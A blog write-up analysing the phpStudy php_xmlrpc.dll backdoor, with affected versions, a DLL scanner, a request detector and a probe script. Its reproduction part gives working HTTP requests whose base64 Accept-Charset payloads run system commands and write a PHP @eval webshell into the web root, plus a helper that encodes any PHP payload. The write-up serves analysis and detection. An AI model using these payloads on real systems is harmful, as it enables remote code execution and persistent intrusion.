phpStudy Backdoor Analysis and Reproduction
Reference: https://blog.csdn.net/qq_38484285/article/details/101381883
Thanks to the original author for sharing!
My SSRF study has finally come to a pause. I had long known that phpStudy was found to ship with a backdoor, and the way it came to light seems to have been rather bizarre. Time is not very plentiful, so today is just a quick look at it.
Affected versions
Currently known affected phpStudy versions:
- phpStudy 2016, php-5.4
- phpStudy 2018, php-5.2.17
- phpStudy 2018, php-5.4.45
Backdoor location
phpStudy 2016 and phpStudy 2018 bundle php-5.2.17 and php-5.4.45.
The backdoor is hidden in the bundled PHP's php_xmlrpc.dll extension module.
For phpStudy 2018 the file is at *:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll (the drive letter depends on where phpStudy was installed).
phpStudy 2016 paths:
- php\php-5.2.17\ext\php_xmlrpc.dll
- php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy 2018 paths:
- PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
- PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
Open the file in Notepad (or any editor or hex viewer) and search for @eval. If the file contains the string @eval(%s('%s')), the backdoor is present, as shown in the screenshot:
[Screenshot: the @eval(%s('%s')) string found inside php_xmlrpc.dll. Conclusion: backdoor present!]
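A scripted version of the Notepad check above, added here as an example (it is not code from the original post or from the phpStudy project): it searches each bundled php_xmlrpc.dll for the @eval(%s('%s')) format string, reports the offsets and surrounding bytes, and prints the file's SHA-256 so it can be compared against hashes published in advisories. The relative paths are the ones listed above; the assumption that phpStudy 2016 keeps php\ at the install root while 2018 keeps it under PHPTutorial\ is taken from those paths, and the rglob fallback is an addition to catch copies in non-standard locations.

```python
import hashlib
import sys
from pathlib import Path

# Format string the trojaned php_xmlrpc.dll carries (the @eval marker the
# page tells you to search for in Notepad), as raw bytes.
BACKDOOR_MARKER = b"@eval(%s('%s'))"

# Relative paths of the bundled extension listed on the page. Layout assumed:
# phpStudy 2016 keeps php\ at the install root, phpStudy 2018 under PHPTutorial\.
KNOWN_RELATIVE_PATHS = [
    Path("php/php-5.2.17/ext/php_xmlrpc.dll"),
    Path("php/php-5.4.45/ext/php_xmlrpc.dll"),
    Path("PHPTutorial/php/php-5.2.17/ext/php_xmlrpc.dll"),
    Path("PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll"),
]


def scan_bytes(data: bytes) -> list:
    """Return every offset at which the backdoor marker occurs in data."""
    hits, start = [], 0
    while True:
        idx = data.find(BACKDOOR_MARKER, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def scan_file(path) -> dict:
    """Scan one DLL: SHA-256 (to compare with published hashes), hit offsets, context."""
    data = Path(path).read_bytes()
    hits = scan_bytes(data)
    return {
        "path": str(path),
        "sha256": hashlib.sha256(data).hexdigest(),
        "backdoored": bool(hits),
        "offsets": hits,
        # A few bytes either side of the first hit, for eyeballing in a report.
        "context": data[max(0, hits[0] - 16): hits[0] + len(BACKDOOR_MARKER) + 16] if hits else b"",
    }


def scan_install(root) -> list:
    """Scan every php_xmlrpc.dll under a phpStudy install root, known paths first."""
    root = Path(root)
    candidates = [root / rel for rel in KNOWN_RELATIVE_PATHS]
    # Also catch copies in non-standard places (a renamed or extra php directory).
    candidates += sorted(root.rglob("php_xmlrpc.dll"))
    seen, results = set(), []
    for p in candidates:
        if p.is_file() and p.resolve() not in seen:
            seen.add(p.resolve())
            results.append(scan_file(p))
    return results


if __name__ == "__main__":
    # Usage: python scan_phpstudy.py D:\PhpStudy20180211
    for r in scan_install(sys.argv[1] if len(sys.argv) > 1 else "."):
        verdict = "BACKDOOR" if r["backdoored"] else "clean"
        print(f'{verdict:8} {r["sha256"][:16]}  {r["path"]}')
```

The string match is a quick triage check, not proof of a clean file: a DLL that lacks the marker should still be compared by hash against the vendor's clean build before it is trusted.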
Requirements
- Request any file whose suffix is .php
- The request carries the header Accept-Encoding: gzip,deflate
- The accept-charset header carries the PHP code to execute, base64-encoded (base64 is an encoding, not encryption; it only hides the payload from a casual glance)
Vulnerability reproduction
exp: net user
GET /index.php HTTP/1.1
Host: 192.168.31.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

The accept-charset line is the important one: its base64 decodes to echo system("net user");
Remote command execution succeeds, and the response lists the user accounts on the machine.

exp: system('calc.exe')
GET /index.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Connection: close
accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOw
Upgrade-Insecure-Requests: 1

The accept-charset value decodes to system('calc.exe'); (calc.exe is the Windows calculator, launched on the target).

exp: write a one-line webshell and connect with China Chopper (菜刀)
GET /index.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Connection: close
accept-charset: c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=
Upgrade-Insecure-Requests: 1

The accept-charset value decodes to system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');
The ^ characters escape < and > for cmd.exe so they are not treated as redirections; only the final > redirects the echoed text into shell.php under the web root, and the path is relative to the working directory of the PHP process.
Possible problems
1. If the connection fails, the shell may have been written to the wrong directory. Run tree /f to list the file tree, find a path that is reachable over the web, and write the shell there:
GET /phpinfo.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9

The accept-charset value decodes to system('tree /f');
2. While reproducing this I ran into a problem myself: when the request is sent to Repeater, a lot of spaces get inserted.
Accept-Encoding: gzip, deflate
In Accept-Encoding there was a space in front of deflate, and that space is what made the replay fail. Removing the space fixes it.
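The trigger conditions, the requests above and the Repeater spacing problem, worked in code as an added example (not code from the original post or from phpStudy): encode_payload produces the accept-charset value the way the requests above do and reproduces the page's own base64 strings; build_request assembles a minimal trigger request; detect_trigger is the mirror-image check a reverse proxy or WAF could run over inbound requests, applying the same three conditions, including an exact match on gzip,deflate, which is why the "gzip, deflate" that Repeater produced does not count as a hit. The PHP keyword regex, the lenient padding logic and the two sample requests are constructed for this illustration; the first sample is the page's "net user" request with its cosmetic headers trimmed.

```python
import base64
import binascii
import re

# Exact Accept-Encoding value the backdoor expects; the page shows that the
# Repeater-normalised "gzip, deflate" (with a space) does not trigger it.
TRIGGER_ENCODING = "gzip,deflate"

# Constructed heuristic: tokens that mark a decoded Accept-Charset as PHP code
# rather than a charset name such as utf-8 or iso-8859-1.
PHP_HINT = re.compile(r"\b(system|eval|exec|shell_exec|passthru|echo|phpinfo)\b", re.I)


def encode_payload(php: str) -> str:
    """Turn PHP source into the accept-charset value the backdoor will eval()."""
    return base64.b64encode(php.encode()).decode()


def build_request(host: str, php: str, path: str = "/index.php") -> str:
    """Minimal trigger request; per the page any .php path works."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"Accept-Encoding: {TRIGGER_ENCODING}",
        f"Accept-Charset: {encode_payload(php)}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def _b64decode_lenient(value: str):
    """Decode base64 that may lack '=' padding (the page's requests omit it)."""
    value = value.strip()
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_headers(raw: str) -> dict:
    """Header names are case-insensitive; the page mixes Accept-Charset and accept-charset."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():
            break
        if ":" in line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return headers


def detect_trigger(raw: str) -> dict:
    """Flag a raw request that satisfies the backdoor's three trigger conditions.

    Returns {'match': bool, 'reason': str, 'payload': decoded PHP or None}.
    """
    request_line = raw.split("\n", 1)[0]
    path = request_line.split(" ")[1] if " " in request_line else ""
    h = parse_headers(raw)
    if not path.split("?")[0].lower().endswith(".php"):
        return {"match": False, "reason": "not a .php request", "payload": None}
    if h.get("accept-encoding") != TRIGGER_ENCODING:
        return {"match": False, "reason": "Accept-Encoding is not exactly gzip,deflate", "payload": None}
    charset = h.get("accept-charset")
    if charset is None:
        return {"match": False, "reason": "no Accept-Charset header", "payload": None}
    decoded = _b64decode_lenient(charset)
    if decoded is None:
        return {"match": False, "reason": "Accept-Charset is not base64", "payload": None}
    text = decoded.decode("latin-1")
    if not PHP_HINT.search(text):
        return {"match": False, "reason": "decoded value does not look like PHP", "payload": text}
    return {"match": True, "reason": "backdoor trigger headers present", "payload": text}


# Constructed samples: the page's "net user" request (trimmed) and a benign
# browser request that legitimately sends Accept-Charset.
SAMPLE_TRIGGER = (
    "GET /index.php HTTP/1.1\r\nHost: 192.168.31.182\r\n"
    "Accept-Encoding:gzip,deflate\r\nConnection: close\r\n"
    "accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET /index.php HTTP/1.1\r\nHost: 192.168.31.182\r\n"
    "Accept-Encoding: gzip, deflate\r\nAccept-Charset: utf-8\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_TRIGGER, SAMPLE_BENIGN):
        print(detect_trigger(raw))
    print(build_request("192.168.31.182", 'echo system("net user");'))
```

detect_trigger needs the full header set, so it belongs in a reverse proxy, a WAF or a request dump reconstructed from a packet capture; a default Apache or nginx access log records only the request line, Referer and User-Agent, not Accept-Charset, so the trigger cannot be hunted there.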
Backdoor detection script (Python 3)
import base64
import sys
import urllib.request
import zlib

# The backdoor eval()s the base64-decoded Accept-Charset value, so a harmless
# echo of a unique marker is enough to confirm it. The header is generated
# from MARKER so the probe and the response check can never drift apart.
MARKER = 'phpstudy backdoor'
PAYLOAD = "echo '%s';" % MARKER

headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
    "content-type": "text/xml",
    "Connection": "close",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Accept-Charset": base64.b64encode(PAYLOAD.encode()).decode(),
    # Must be exactly "gzip,deflate" with no space; a space breaks the trigger.
    "Accept-Encoding": "gzip,deflate",
    "Upgrade-Insecure-Requests": "1",
}


def check(target):
    request = urllib.request.Request(url=target, headers=headers)
    response = urllib.request.urlopen(request, timeout=10)
    result = response.read()
    # The server may honour Accept-Encoding and gzip the body; inflate before searching.
    if response.headers.get('Content-Encoding') == 'gzip':
        result = zlib.decompress(result, 16 + zlib.MAX_WBITS)
    if MARKER.encode() in result:
        print('{0} {1}'.format(target, 'backdoor present'))
    else:
        print('{0} {1}'.format(target, 'no backdoor'))


if __name__ == '__main__':
    print('PHPStudy backdoor detection tool')
    print('Checking', sys.argv[1])
    check(sys.argv[1])

Note: this script was originally written for Python 2 and used urllib2, which no longer exists in Python 3; the version above uses urllib.request instead. Point it at any .php URL on the target, for example python check.py http://192.168.0.108/index.php.